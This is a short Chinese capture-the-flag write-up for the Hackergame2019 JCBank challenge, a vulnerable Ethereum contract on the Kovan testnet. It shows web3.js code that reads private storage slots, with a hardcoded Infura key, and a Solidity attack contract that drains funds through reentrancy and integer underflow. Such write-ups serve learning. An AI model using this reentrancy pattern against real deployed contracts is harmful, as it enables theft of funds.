Hackergame2019 JCBank

前言

• 以太坊 Kovan 测试链
• 合约地址：https://kovan.etherscan.io/address/0xE575c9abD35Fa94F1949f7d559056bB66FddEB51

• 题目：https://github.com/hitcxy/blockchain-challenges/tree/master/2019/Hackergame/JCBank

• 两个 flag :

  • get_flag_1
  • get_flag_2

• get_flag_1 读取 storage 变量 secret 的值即可，其值为 0x175bddc0da1bd47369c47861f48c8ac ，调用 get_flag_1 即可

var Web3=require("web3");
if (typeof web3 !== 'undefined') {
    web3 = new Web3(web3.currentProvider);
} else {
    web3 = new Web3(new Web3.providers.HttpProvider("https://kovan.infura.io/v3/b38f10b5036f4e6691fcc690461097d1"));
}

var address="0xE575c9abD35Fa94F1949f7d559056bB66FddEB51";
web3.eth.getStorageAt(address, 0, function(x,y){console.info(y)});
web3.eth.getStorageAt(address, 1, function(x,y){console.info(y)});
web3.eth.getStorageAt(address, 2, function(x,y){console.info(y)});

• get_flag_2 利用 Reentrancy 和 整型下溢

contract hack {
    address instance_address = 0xE575c9abD35Fa94F1949f7d559056bB66FddEB51;
    JCBank target = JCBank(instance_address);
    uint public have_withdraw = 0;
    string public s;
    
    constructor() public payable {}
    
    function attack() public {
        target.deposit.value(0.1 ether)();
    }
    
    function attack1(uint128 guess) public {
        s=target.get_flag_1(guess);
    }
    
    function attack2() public {
        if(have_withdraw == 1){
            target.get_flag_2(155418233698);
        }
    }

    function attack3() public {
        target.withdraw(0.1 ether);
    }

    function() payable {
        if (have_withdraw == 0 && msg.sender == instance_address){
            have_withdraw = 1;
            target.withdraw(0.1 ether);
        }
    }
}

• attack 存入一点金额，attack3 重入攻击两次， attack2 调用 get_flag_2 即可